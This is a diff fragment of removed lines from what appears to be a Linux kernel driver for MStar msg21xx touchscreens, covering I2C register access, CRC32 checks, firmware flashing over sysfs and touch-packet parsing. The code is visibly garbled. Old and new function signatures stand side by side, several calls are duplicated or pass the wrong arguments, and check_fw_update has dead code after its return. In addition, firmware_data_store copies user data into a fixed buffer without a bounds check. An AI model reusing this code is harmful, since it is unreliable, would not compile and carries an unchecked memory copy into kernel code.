--	EMEM_ALL = 0,
--	EMEM_MAIN,
--	EMEM_INFO,
--};
--
--/* Function Definition */
--
--static unsigned int _CRC_doReflect(unsigned int ref, signed char ch)
--{
--	unsigned int value = 0;
--	unsigned int i = 0;
--
--	for (i = 1; i < (ch + 1); i++) {
--		if (ref & 1)
--			value |= 1 << (ch - i);
--		ref >>= 1;
--	}
--
--	return value;
--}
--
--static unsigned int _CRC_getValue(unsigned int text, unsigned int prevCRC)
--{
--	unsigned int ulCRC = prevCRC;
--
--	ulCRC = (ulCRC >> 8) ^ crc32_table[(ulCRC & 0xFF) ^ text];
--
--	return ulCRC;
--}
--
--static void _CRC_initTable(void)
--{
--	unsigned int magic_number = 0x04c11db7;
--	unsigned int i, j;
--
--	for (i = 0; i <= 0xFF; i++) {
--		crc32_table[i] = _CRC_doReflect(i, 8) << 24;
--		for (j = 0; j < 8; j++)
--			crc32_table[i] = (crc32_table[i] << 1) ^
--				(crc32_table[i] & (0x80000000L) ?
--					magic_number : 0);
--		crc32_table[i] = _CRC_doReflect(crc32_table[i], 32);
--	}
--}
--
--static void msg21xx_reset_hw(struct msg21xx_ts_platform_data *pdata)
--{
--	gpio_direction_output(pdata->reset_gpio, 1);
--	gpio_set_value_cansleep(pdata->reset_gpio, 0);
--	/* Note that the RST must be in LOW 10ms at least */
--	usleep(pdata->hard_reset_delay_ms * 1000);
--	gpio_set_value_cansleep(pdata->reset_gpio, 1);
--	/* Enable the interrupt service thread/routine for INT after 50ms */
--	usleep(pdata->post_hard_reset_delay_ms * 1000);
--}
--
--static int read_i2c_seq(struct msg21xx_ts_data *ts_data, unsigned char addr,
--			unsigned char *buf, unsigned short size)
--{
--	int rc = 0;
--	struct i2c_msg msgs[] = {
--		{
--			.addr = addr,
--			.flags = I2C_M_RD, /* read flag */
--			.len = size,
--			.buf = buf,
--		},
--	};
--
--	/* If everything went ok (i.e. 1 msg transmitted), return #bytes
--	 * transmitted, else error code.
--	 */
--	if (ts_data->client != NULL) {
--		rc = i2c_transfer(ts_data->client->adapter, msgs, 1);
--		if (rc < 0)
--			dev_err(&ts_data->client->dev,
--				"%s error %d\n", __func__, rc);
--	} else {
--		dev_err(&ts_data->client->dev, "ts_data->client is NULL\n");
--	}
--
--	return rc;
--}
--
--static int write_i2c_seq(struct msg21xx_ts_data *ts_data, unsigned char addr,
--			unsigned char *buf, unsigned short size)
--{
--	int rc = 0;
--	struct i2c_msg msgs[] = {
--		{
--			.addr = addr,
--			/*
--			 * if read flag is undefined,
--			 * then it means write flag.
--			 */
--			.flags = 0,
--			.len = size,
--			.buf = buf,
--		},
--	};
--
--	/*
--	 * If everything went ok (i.e. 1 msg transmitted), return #bytes
--	 * transmitted, else error code.
--	 */
--	if (ts_data->client != NULL) {
--		rc = i2c_transfer(ts_data->client->adapter, msgs, 1);
--		if (rc < 0)
--			dev_err(&ts_data->client->dev,
--				"%s error %d\n", __func__, rc);
--	} else {
--		dev_err(&ts_data->client->dev, "ts_data->client is NULL\n");
--	}
--
--	return rc;
--}
--
--static unsigned short read_reg(struct msg21xx_ts_data *ts_data,
--					unsigned char bank, unsigned char addr)
--{
--	unsigned char tx_data[3] = {0x10, bank, addr};
--	unsigned char rx_data[2] = {0};
--
--	write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, tx_data, sizeof(tx_data));
--	read_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, rx_data, sizeof(rx_data));
--
--	return rx_data[1] << 8 | rx_data[0];
--}
--
--static void write_reg(struct msg21xx_ts_data *ts_data, unsigned char bank,
--				unsigned char addr,
--						unsigned short data)
--{
--	unsigned char tx_data[5] = {0x10, bank, addr, data & 0xFF, data >> 8};
--
--	write_i2c_seq(SLAVE_I2C_ID_DBBUS, &tx_data[0], 5);
--	write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, tx_data, sizeof(tx_data));
--}
--
--static void write_reg_8bit(struct msg21xx_ts_data *ts_data, unsigned char bank,
--				unsigned char addr,
--						unsigned char data)
--{
--	unsigned char tx_data[4] = {0x10, bank, addr, data};
--
--	write_i2c_seq(SLAVE_I2C_ID_DBBUS, &tx_data[0], 4);
--	write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, tx_data, sizeof(tx_data));
--}
--
--static void dbbusDWIICEnterSerialDebugMode(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char data[5];
--
--	/* Enter the Serial Debug Mode */
--	data[0] = 0x53;
--	data[1] = 0x45;
--	data[2] = 0x52;
--	data[3] = 0x44;
--	data[4] = 0x42;
--
--	write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data));
--}
--
--static void dbbusDWIICStopMCU(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char data[1];
--
--	/* Stop the MCU */
--	data[0] = 0x37;
--
--	write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data));
--}
--
--static void dbbusDWIICIICUseBus(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char data[1];
--
--	/* IIC Use Bus */
--	data[0] = 0x35;
--
--	write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data));
--}
--
--static void dbbusDWIICIICReshape(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char data[1];
--
--	/* IIC Re-shape */
--	data[0] = 0x71;
--
--	write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data));
--}
--
--static unsigned char msg21xx_get_ic_type(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char ic_type = 0;
--	unsigned char bank;
--	unsigned char addr;
--
--	msg21xx_reset_hw(ts_data->pdata);
--	dbbusDWIICEnterSerialDebugMode(ts_data);
--	dbbusDWIICStopMCU(ts_data);
--	dbbusDWIICIICUseBus(ts_data);
--	dbbusDWIICIICReshape(ts_data);
--	msleep(300);
--
--	/* stop mcu */
--	write_reg_8bit(ts_data, 0x0F, 0xE6, 0x01);
--	/* disable watch dog */
--	write_reg(ts_data, 0x3C, 0x60, 0xAA55);
--	/* get ic type */
--	bank = MSTAR_CHIPTOP_REGISTER_BANK;
--	addr = MSTAR_CHIPTOP_REGISTER_ICTYPE;
--	ic_type = (0xff)&(read_reg(ts_data, bank, addr));
--
--	if (ic_type != ts_data->pdata->ic_type)
--		ic_type = 0;
--
--	msg21xx_reset_hw(ts_data->pdata);
--
--	return ic_type;
--}
--
--static int msg21xx_read_firmware_id(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char command[3] = { 0x53, 0x00, 0x2A};
--	unsigned char response[4] = { 0 };
--
--	mutex_lock(&msg21xx_mutex);
--	write_i2c_seq(ts_data, ts_data->client->addr, command, sizeof(command));
--	read_i2c_seq(ts_data, ts_data->client->addr, response,
--				sizeof(response));
--	mutex_unlock(&msg21xx_mutex);
--	ts_data->pdata->fw_version_major = (response[1]<<8) + response[0];
--	ts_data->pdata->fw_version_minor = (response[3]<<8) + response[2];
--
--	dev_info(&ts_data->client->dev, "major num = %d, minor num = %d\n",
--			ts_data->pdata->fw_version_major,
--			ts_data->pdata->fw_version_minor);
--
--	return 0;
--}
--
--static int firmware_erase_c33(struct msg21xx_ts_data *ts_data,
--					enum EMEM_TYPE_t emem_type)
--{
--	/* stop mcu */
--	write_reg(ts_data, 0x0F, 0xE6, 0x0001);
--
--	/* disable watch dog */
--	write_reg_8bit(ts_data, 0x3C, 0x60, 0x55);
--	write_reg_8bit(ts_data, 0x3C, 0x61, 0xAA);
--
--	/* set PROGRAM password */
--	write_reg_8bit(ts_data, 0x16, 0x1A, 0xBA);
--	write_reg_8bit(ts_data, 0x16, 0x1B, 0xAB);
--
--	write_reg_8bit(ts_data, 0x16, 0x18, 0x80);
--
--	if (emem_type == EMEM_ALL)
--		write_reg_8bit(ts_data, 0x16, 0x08, 0x10);
--
--	write_reg_8bit(ts_data, 0x16, 0x18, 0x40);
--	msleep(20);
--
--	/* clear pce */
--	write_reg_8bit(0x16, 0x18, 0x80);
--
--	/* erase trigger */
--	if (emem_type == EMEM_MAIN)
--		write_reg_8bit(ts_data, 0x16, 0x0E, 0x04); /* erase main */
--	else
--		write_reg_8bit(0x16, 0x0E, 0x08); /* erase all block */
--
--	return 1;
--}
--
--static void _ReadBinConfig(void);
--static unsigned int _CalMainCRC32(void);
--
--static int check_fw_update(void)
--{
--	int ret = 0;
--
--	msg21xx_read_firmware_id();
--	_ReadBinConfig();
--	if (main_sw_id == info_sw_id) {
--		if (_CalMainCRC32() == bin_conf_crc32) {
--			/*check upgrading*/
--			if ((update_bin_major == pdata->fw_version_major) &&
--				(update_bin_minor > pdata->fw_version_minor)) {
--				ret = 1;
--			}
--		}
--	}
--	return ret;
--		write_reg_8bit(ts_data, 0x16, 0x0E, 0x08); /* erase all block */
--
--	return 0;
--}
--
--static ssize_t firmware_update_c33(struct device *dev,
--						struct device_attribute *attr,
--						const char *buf, size_t size,
--						enum EMEM_TYPE_t emem_type,
--						bool isForce) {
--	unsigned int i, j;
--	unsigned int crc_main, crc_main_tp;
--	unsigned int crc_info, crc_info_tp;
--	unsigned short reg_data = 0;
--	int update_pass = 1;
--	bool fw_upgrade = false;
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	crc_main = 0xffffffff;
--	crc_info = 0xffffffff;
--
--	msg21xx_reset_hw(ts_data->pdata);
--
--	msg21xx_read_firmware_id(ts_data);
--	_ReadBinConfig(ts_data);
--	if ((main_sw_id == info_sw_id) &&
--		(_CalMainCRC32(ts_data) == bin_conf_crc32) &&
--		(fw_file_major == ts_data->pdata->fw_version_major) &&
--		(fw_file_minor > ts_data->pdata->fw_version_minor)) {
--		fw_upgrade = true;
--	}
--
--	if (!fw_upgrade && !isForce) {
--		dev_dbg(dev, "no need to update\n");
--		msg21xx_reset_hw(ts_data->pdata);
--		return size;
--	}
--	msg21xx_reset_hw(ts_data->pdata);
--	msleep(300);
--
--	dbbusDWIICEnterSerialDebugMode(ts_data);
--	dbbusDWIICStopMCU(ts_data);
--	dbbusDWIICIICUseBus(ts_data);
--	dbbusDWIICIICReshape(ts_data);
--	msleep(300);
--
--	/* erase main */
--	firmware_erase_c33(ts_data, EMEM_MAIN);
--	msleep(1000);
--
--	msg21xx_reset_hw(ts_data->pdata);
--	dbbusDWIICEnterSerialDebugMode(ts_data);
--	dbbusDWIICStopMCU(ts_data);
--	dbbusDWIICIICUseBus(ts_data);
--	dbbusDWIICIICReshape(ts_data);
--	msleep(300);
--	/*
--	 * Program
--	 */
--	/* polling 0x3CE4 is 0x1C70 */
--	if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
--		do {
--			reg_data = read_reg(ts_data, 0x3C, 0xE4);
--		} while (reg_data != 0x1C70);
--	}
--
--	switch (emem_type) {
--	case EMEM_ALL:
--		write_reg(ts_data, 0x3C, 0xE4, 0xE38F);  /* for all-blocks */
--		break;
--	case EMEM_MAIN:
--		write_reg(ts_data, 0x3C, 0xE4, 0x7731);  /* for main block */
--		break;
--	case EMEM_INFO:
--		write_reg(ts_data, 0x3C, 0xE4, 0x7731);  /* for info block */
--
--		write_reg_8bit(ts_data, 0x0F, 0xE6, 0x01);
--
--		write_reg_8bit(ts_data, 0x3C, 0xE4, 0xC5);
--		write_reg_8bit(ts_data, 0x3C, 0xE5, 0x78);
--
--		write_reg_8bit(ts_data, MSTAR_CHIPTOP_REGISTER_BANK,
--						0x04, 0x9F);
--		write_reg_8bit(ts_data, MSTAR_CHIPTOP_REGISTER_BANK,
--						0x05, 0x82);
--
--		write_reg_8bit(ts_data, 0x0F, 0xE6, 0x00);
--		msleep(100);
--		break;
--	}
--
--	/* polling 0x3CE4 is 0x2F43 */
--	do {
--		reg_data = read_reg(ts_data, 0x3C, 0xE4);
--	} while (reg_data != 0x2F43);
--
--	/* calculate CRC 32 */
--	_CRC_initTable();
--
--	/* total  32 KB : 2 byte per R/W */
--	for (i = 0; i < 32; i++) {
--		if (i == 31) {
--			fw_bin_data[i][1014] = 0x5A;
--			fw_bin_data[i][1015] = 0xA5;
--
--			for (j = 0; j < 1016; j++)
--				crc_main = _CRC_getValue(fw_bin_data[i][j],
--							crc_main);
--		} else {
--			for (j = 0; j < 1024; j++)
--				crc_main = _CRC_getValue(fw_bin_data[i][j],
--							crc_main);
--		}
--
--		for (j = 0; j < 8; j++)
--			write_i2c_seq(ts_data, ts_data->client->addr,
--						&fw_bin_data[i][j * 128], 128);
--		msleep(100);
--
--		/* polling 0x3CE4 is 0xD0BC */
--		do {
--			reg_data = read_reg(ts_data, 0x3C, 0xE4);
--		} while (reg_data != 0xD0BC);
--
--		write_reg(ts_data, 0x3C, 0xE4, 0x2F43);
--	}
--
--	if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
--		/* write file done and check crc */
--		write_reg(ts_data, 0x3C, 0xE4, 0x1380);
--	}
--	msleep(20);
--
--	if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
--		/* polling 0x3CE4 is 0x9432 */
--		do {
--			reg_data = read_reg(ts_data, 0x3C, 0xE4);
--		} while (reg_data != 0x9432);
--	}
--
--	crc_main = crc_main ^ 0xffffffff;
--	crc_info = crc_info ^ 0xffffffff;
--
--	if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
--		/* CRC Main from TP */
--		crc_main_tp = read_reg(ts_data, 0x3C, 0x80);
--		crc_main_tp = (crc_main_tp << 16) |
--						read_reg(ts_data, 0x3C, 0x82);
--
--		/* CRC Info from TP */
--		crc_info_tp = read_reg(ts_data, 0x3C, 0xA0);
--		crc_info_tp = (crc_info_tp << 16) |
--						read_reg(ts_data, 0x3C, 0xA2);
--	}
--
--	update_pass = 1;
--	if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
--		if (crc_main_tp != crc_main)
--			update_pass = 0;
--	}
--
--	if (!update_pass) {
--		dev_err(dev, "update_C33 failed\n");
--		msg21xx_reset_hw(ts_data->pdata);
--		return 0;
--	}
--
--	dev_dbg(dev, "update_C33 OK\n");
--	msg21xx_reset_hw(ts_data->pdata);
--	return size;
--}
--
--static unsigned int _CalMainCRC32(struct msg21xx_ts_data *ts_data)
--{
--	unsigned int ret = 0;
--	unsigned short reg_data = 0;
--
--	msg21xx_reset_hw(ts_data->pdata);
--
--	dbbusDWIICEnterSerialDebugMode(ts_data);
--	dbbusDWIICStopMCU(ts_data);
--	dbbusDWIICIICUseBus(ts_data);
--	dbbusDWIICIICReshape(ts_data);
--	msleep(100);
--
--	/* Stop MCU */
--	write_reg(ts_data, 0x0F, 0xE6, 0x0001);
--
--	/* Stop Watchdog */
--	write_reg_8bit(ts_data, 0x3C, 0x60, 0x55);
--	write_reg_8bit(ts_data, 0x3C, 0x61, 0xAA);
--
--	/* cmd */
--	write_reg(ts_data, 0x3C, 0xE4, 0xDF4C);
--	write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x7d60);
--	/* TP SW reset */
--	write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x829F);
--
--	/* MCU run */
--	write_reg(ts_data, 0x0F, 0xE6, 0x0000);
--
--	/* polling 0x3CE4 */
--	do {
--		reg_data = read_reg(ts_data, 0x3C, 0xE4);
--	} while (reg_data != 0x9432);
--
--	/* Cal CRC Main from TP */
--	ret = read_reg(ts_data, 0x3C, 0x80);
--	ret = (ret << 16) | read_reg(ts_data, 0x3C, 0x82);
--
--	dev_dbg(&ts_data->client->dev,
--			"[21xxA]:Current main crc32=0x%x\n", ret);
--	return ret;
--}
--
--static void _ReadBinConfig(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char dbbus_tx_data[5] = {0};
--	unsigned char dbbus_rx_data[4] = {0};
--	unsigned short reg_data = 0;
--
--	msg21xx_reset_hw(ts_data->pdata);
--
--	dbbusDWIICEnterSerialDebugMode(ts_data);
--	dbbusDWIICStopMCU(ts_data);
--	dbbusDWIICIICUseBus(ts_data);
--	dbbusDWIICIICReshape(ts_data);
--	msleep(100);
--
--	/* Stop MCU */
--	write_reg(ts_data, 0x0F, 0xE6, 0x0001);
--
--	/* Stop Watchdog */
--	write_reg_8bit(ts_data, 0x3C, 0x60, 0x55);
--	write_reg_8bit(ts_data, 0x3C, 0x61, 0xAA);
--
--	/* cmd */
--	write_reg(ts_data, 0x3C, 0xE4, 0xA4AB);
--	write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x7d60);
--
--	/* TP SW reset */
--	write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x829F);
--
--	/* MCU run */
--	write_reg(ts_data, 0x0F, 0xE6, 0x0000);
--
--	/* polling 0x3CE4 */
--	do {
--		reg_data = read_reg(ts_data, 0x3C, 0xE4);
--	} while (reg_data != 0x5B58);
--
--	dbbus_tx_data[0] = 0x72;
--	dbbus_tx_data[1] = 0x7F;
--	dbbus_tx_data[2] = 0x55;
--	dbbus_tx_data[3] = 0x00;
--	dbbus_tx_data[4] = 0x04;
--	write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 5);
--	read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4);
--	if ((dbbus_rx_data[0] >= 0x30 && dbbus_rx_data[0] <= 0x39)
--		&& (dbbus_rx_data[1] >= 0x30 && dbbus_rx_data[1] <= 0x39)
--		&& (dbbus_rx_data[2] >= 0x31 && dbbus_rx_data[2] <= 0x39)) {
--		main_sw_id = (dbbus_rx_data[0] - 0x30) * 100 +
--					(dbbus_rx_data[1] - 0x30) * 10 +
--					(dbbus_rx_data[2] - 0x30);
--	}
--
--	dbbus_tx_data[0] = 0x72;
--	dbbus_tx_data[1] = 0x7F;
--	dbbus_tx_data[2] = 0xFC;
--	dbbus_tx_data[3] = 0x00;
--	dbbus_tx_data[4] = 0x04;
--	write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 5);
--	read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4);
--	bin_conf_crc32 = (dbbus_rx_data[0] << 24) |
--			(dbbus_rx_data[1] << 16) |
--			(dbbus_rx_data[2] << 8) |
--			(dbbus_rx_data[3]);
--
--	dbbus_tx_data[0] = 0x72;
--	dbbus_tx_data[1] = 0x83;
--	dbbus_tx_data[2] = 0x00;
--	dbbus_tx_data[3] = 0x00;
--	dbbus_tx_data[4] = 0x04;
--	write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 5);
--	read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4);
--	if ((dbbus_rx_data[0] >= 0x30 && dbbus_rx_data[0] <= 0x39)
--		&& (dbbus_rx_data[1] >= 0x30 && dbbus_rx_data[1] <= 0x39)
--		&& (dbbus_rx_data[2] >= 0x31 && dbbus_rx_data[2] <= 0x39)) {
--		info_sw_id = (dbbus_rx_data[0] - 0x30) * 100 +
--					(dbbus_rx_data[1] - 0x30) * 10 +
--					(dbbus_rx_data[2] - 0x30);
--	}
--
--	dev_dbg(&ts_data->client->dev,
--		"[21xxA]:main_sw_id = %d, info_sw_id = %d, bin_conf_crc32 = 0x%x\n",
--		main_sw_id, info_sw_id, bin_conf_crc32);
--}
--
--static ssize_t firmware_update_show(struct device *dev,
--						struct device_attribute *attr,
--						char *buf)
--{
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	return snprintf(buf, 3, "%d\n", ts_data->pdata->updating_fw);
--}
--
--static ssize_t firmware_update_store(struct device *dev,
--						struct device_attribute *attr,
--						const char *buf,
--						size_t size)
--{
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	ts_data->pdata->updating_fw = true;
--	disable_irq(ts_data->client->irq);
--
--	size = firmware_update_c33(dev, attr, buf, size, EMEM_MAIN, false);
--
--	enable_irq(ts_data->client->irq);
--	ts_data->pdata->updating_fw = false;
--
--	return size;
--}
--
--static DEVICE_ATTR(update, (S_IRUGO | S_IWUSR),
--					firmware_update_show,
--					firmware_update_store);
--
--static int prepare_fw_data(struct device *dev)
--{
--	int count;
--	int i;
--	int ret;
--	const struct firmware *fw = NULL;
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	ret = request_firmware(&fw, ts_data->pdata->fw_name, dev);
--	if (ret < 0) {
--		dev_err(dev, "Request firmware failed - %s (%d)\n",
--						ts_data->pdata->fw_name, ret);
--		return ret;
--	}
--
--	count = fw->size / 1024;
--
--	for (i = 0; i < count; i++)
--		memcpy(fw_bin_data[i], fw->data + (i * 1024), 1024);
--
--	fw_file_major = MSG_FW_FILE_MAJOR_VERSION(fw);
--	fw_file_minor = MSG_FW_FILE_MINOR_VERSION(fw);
--	dev_dbg(dev, "New firmware: %d.%d",
--			fw_file_major, fw_file_minor);
--
--	return fw->size;
--}
--
--static ssize_t firmware_update_smart_store(struct device *dev,
--						struct device_attribute *attr,
--						const char *buf,
--						size_t size)
--{
--	int ret;
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	ret = prepare_fw_data(dev);
--	if (ret < 0) {
--		dev_err(dev, "Request firmware failed -(%d)\n", ret);
--		return ret;
--	}
--	ts_data->pdata->updating_fw = true;
--	disable_irq(ts_data->client->irq);
--
--	ret = firmware_update_c33(dev, attr, buf, size, EMEM_MAIN, false);
--	if (ret == 0)
--		dev_err(dev, "firmware_update_c33 ret = %d\n", ret);
--
--	enable_irq(ts_data->client->irq);
--	ts_data->pdata->updating_fw = false;
--
--	return ret;
--}
--
--static ssize_t firmware_force_update_smart_store(struct device *dev,
--						struct device_attribute *attr,
--						const char *buf,
--						size_t size)
--{
--	int ret;
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	ret = prepare_fw_data(dev);
--	if (ret < 0) {
--		dev_err(dev, "Request firmware failed -(%d)\n", ret);
--		return ret;
--	}
--	ts_data->pdata->updating_fw = true;
--	disable_irq(ts_data->client->irq);
--
--	ret = firmware_update_c33(dev, attr, buf, size, EMEM_MAIN, true);
--	if (ret == 0)
--		dev_err(dev, "firmware_update_c33 et = %d\n", ret);
--
--	enable_irq(ts_data->client->irq);
--	ts_data->pdata->updating_fw = false;
--
--	return ret;
--}
--
--static DEVICE_ATTR(update_fw, (S_IRUGO | S_IWUSR),
--					firmware_update_show,
--					firmware_update_smart_store);
--
--static DEVICE_ATTR(force_update_fw, (S_IRUGO | S_IWUSR),
--					firmware_update_show,
--					firmware_force_update_smart_store);
--
--static ssize_t firmware_version_show(struct device *dev,
--					struct device_attribute *attr,
--					char *buf)
--{
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	msg21xx_read_firmware_id(ts_data);
--	return snprintf(buf, sizeof(char) * 8, "%03d%03d\n",
--			ts_data->pdata->fw_version_major,
--			ts_data->pdata->fw_version_minor);
--}
--
--static DEVICE_ATTR(version, S_IRUGO,
--					firmware_version_show,
--					NULL);
--
--
--static ssize_t msg21xx_fw_name_show(struct device *dev,
--				struct device_attribute *attr, char *buf)
--{
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	return snprintf(buf, MSTAR_FW_NAME_MAX_LEN - 1,
--				"%s\n", ts_data->pdata->fw_name);
--}
--
--static ssize_t msg21xx_fw_name_store(struct device *dev,
--				struct device_attribute *attr,
--				const char *buf, size_t size)
--{
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	if (size > MSTAR_FW_NAME_MAX_LEN - 1)
--		return -EINVAL;
--
--	strlcpy(ts_data->pdata->fw_name, buf, size);
--	if (ts_data->pdata->fw_name[size - 1] == '\n')
--		ts_data->pdata->fw_name[size - 1] = 0;
--
--	return size;
--}
--
--static DEVICE_ATTR(fw_name, (S_IRUGO | S_IWUSR),
--			msg21xx_fw_name_show, msg21xx_fw_name_store);
--
--static ssize_t firmware_data_store(struct device *dev,
--					struct device_attribute *attr,
--					const char *buf,
--					size_t size)
--{
--	int count = size / 1024;
--	int i;
--
--	for (i = 0; i < count; i++)
--		memcpy(fw_bin_data[i], buf + (i * 1024), 1024);
--
--	if (buf != NULL)
--		dev_dbg(dev, "buf[0] = %c\n", buf[0]);
--
--	return size;
--}
--
--static DEVICE_ATTR(data, S_IWUSR, NULL, firmware_data_store);
--
--static ssize_t tp_print_show(struct device *dev,
--				struct device_attribute *attr,
--				char *buf)
--{
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	tp_print_proc_read(ts_data);
--
--	return snprintf(buf, 3, "%d\n", ts_data->suspended);
--}
--
--static ssize_t tp_print_store(struct device *dev,
--				struct device_attribute *attr,
--				const char *buf,
--				size_t size)
--{
--	return size;
--}
--
--static DEVICE_ATTR(tpp, (S_IRUGO | S_IWUSR),
--				tp_print_show, tp_print_store);
--
--#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
--static void _msg_enable_proximity(void)
--{
--	unsigned char tx_data[4] = {0};
--
--	tx_data[0] = 0x52;
--	tx_data[1] = 0x00;
--	tx_data[2] = 0x47;
--	tx_data[3] = 0xa0;
--	mutex_lock(&msg21xx_mutex);
--	write_i2c_seq(ts_data->client->addr, &tx_data[0], 4);
--	mutex_unlock(&msg21xx_mutex);
--
--	bEnableTpProximity = 1;
--}
--
--static void _msg_disable_proximity(void)
--{
--	unsigned char tx_data[4] = {0};
--
--	tx_data[0] = 0x52;
--	tx_data[1] = 0x00;
--	tx_data[2] = 0x47;
--	tx_data[3] = 0xa1;
--	mutex_lock(&msg21xx_mutex);
--	write_i2c_seq(ts_data->client->addr, &tx_data[0], 4);
--	mutex_unlock(&msg21xx_mutex);
--
--	bEnableTpProximity = 0;
--	bFaceClosingTp = 0;
--}
--
--static void tsps_msg21xx_enable(int en)
--{
--	if (en)
--		_msg_enable_proximity();
--	else
--		_msg_disable_proximity();
--}
--
--static int tsps_msg21xx_data(void)
--{
--	return bFaceClosingTp;
--}
--#endif
--
--static int msg21xx_pinctrl_init(struct msg21xx_ts_data *ts_data)
--{
--	int retval;
--
--	/* Get pinctrl if target uses pinctrl */
--	ts_data->ts_pinctrl = devm_pinctrl_get(&(ts_data->client->dev));
--	if (IS_ERR_OR_NULL(ts_data->ts_pinctrl)) {
--		retval = PTR_ERR(ts_data->ts_pinctrl);
--		dev_dbg(&ts_data->client->dev,
--			"Target does not use pinctrl %d\n", retval);
--		goto err_pinctrl_get;
--	}
--
--	ts_data->pinctrl_state_active = pinctrl_lookup_state(
--			ts_data->ts_pinctrl, PINCTRL_STATE_ACTIVE);
--	if (IS_ERR_OR_NULL(ts_data->pinctrl_state_active)) {
--		retval = PTR_ERR(ts_data->pinctrl_state_active);
--		dev_dbg(&ts_data->client->dev,
--			"Can't lookup %s pinstate %d\n",
--			PINCTRL_STATE_ACTIVE, retval);
--		goto err_pinctrl_lookup;
--	}
--
--	ts_data->pinctrl_state_suspend = pinctrl_lookup_state(
--			ts_data->ts_pinctrl, PINCTRL_STATE_SUSPEND);
--	if (IS_ERR_OR_NULL(ts_data->pinctrl_state_suspend)) {
--		retval = PTR_ERR(ts_data->pinctrl_state_suspend);
--		dev_dbg(&ts_data->client->dev,
--			"Can't lookup %s pinstate %d\n",
--			PINCTRL_STATE_SUSPEND, retval);
--		goto err_pinctrl_lookup;
--	}
--
--	ts_data->pinctrl_state_release = pinctrl_lookup_state(
--			ts_data->ts_pinctrl, PINCTRL_STATE_RELEASE);
--	if (IS_ERR_OR_NULL(ts_data->pinctrl_state_release)) {
--		retval = PTR_ERR(ts_data->pinctrl_state_release);
--		dev_dbg(&ts_data->client->dev,
--			"Can't lookup %s pinstate %d\n",
--			PINCTRL_STATE_RELEASE, retval);
--	}
--
--	return 0;
--
--err_pinctrl_lookup:
--	devm_pinctrl_put(ts_data->ts_pinctrl);
--err_pinctrl_get:
--	ts_data->ts_pinctrl = NULL;
--	return retval;
--}
--
--static unsigned char calculate_checksum(unsigned char *msg, int length)
--{
--	int checksum = 0, i;
--
--	for (i = 0; i < length; i++)
--		checksum += msg[i];
--
--	return (unsigned char)((-checksum) & 0xFF);
--}
--
--static int parse_info(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char data[DEMO_MODE_PACKET_LENGTH] = {0};
--	unsigned char checksum = 0;
--	unsigned int x = 0, y = 0;
--	unsigned int x2 = 0, y2 = 0;
--	unsigned int delta_x = 0, delta_y = 0;
--
--	mutex_lock(&msg21xx_mutex);
--	read_i2c_seq(ts_data, ts_data->client->addr, &data[0],
--				DEMO_MODE_PACKET_LENGTH);
--	mutex_unlock(&msg21xx_mutex);
--	checksum = calculate_checksum(&data[0], (DEMO_MODE_PACKET_LENGTH-1));
--	dev_dbg(&ts_data->client->dev, "check sum: [%x] == [%x]?\n",
--			data[DEMO_MODE_PACKET_LENGTH-1], checksum);
--
--	if (data[DEMO_MODE_PACKET_LENGTH-1] != checksum) {
--		dev_err(&ts_data->client->dev, "WRONG CHECKSUM\n");
--		return -EINVAL;
--	}
--
--	if (data[0] != 0x52) {
--		dev_err(&ts_data->client->dev, "WRONG HEADER\n");
--		return -EINVAL;
--	}
--
--	ts_data->info.keycode = 0xFF;
--	if ((data[1] == 0xFF) && (data[2] == 0xFF) &&
--		(data[3] == 0xFF) && (data[4] == 0xFF) &&
--		(data[6] == 0xFF)) {
--		if ((data[5] == 0xFF) || (data[5] == 0)) {
--			ts_data->info.keycode = 0xFF;
--		} else if ((data[5] == 1) || (data[5] == 2) ||
--				(data[5] == 4) || (data[5] == 8)) {
--			ts_data->info.keycode = data[5] >> 1;
--
--			dev_dbg(&ts_data->client->dev,
--				"ts_data->info.keycode index %d\n",
--				ts_data->info.keycode);
--		}
